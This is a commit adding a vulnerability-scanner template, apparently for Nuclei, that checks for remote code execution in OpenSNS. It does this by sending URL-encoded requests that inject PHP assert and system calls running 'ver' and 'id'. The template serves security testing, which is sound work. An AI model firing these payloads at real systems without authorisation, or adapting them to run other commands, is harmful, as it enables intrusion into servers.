Create opensns-rce.yaml

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-07 18:49:36 +09:00 · 2021-07-07 18:49:36 +09:00 · c3cbee2794
parent 51d40b1ae6
commit c3cbee2794
1 changed files with 28 additions and 0 deletions
--- a/vulnerabilities/other/opensns-rce.yaml
+++ b/vulnerabilities/other/opensns-rce.yaml
@ -0,0 +1,28 @@
+id: opensns-rce
+
+info:
+  name: OpenSNS RCE
+  author: gy741
+  severity: critical
+  reference: http://www.0dayhack.net/index.php/2417/
+  tags: opensns,rce
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)'
+      - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Microsoft Windows"
+          - "uid="
+          - "gid="
+          - "groups="
+        part: body
+
+      - type: status
+        status:
+          - 200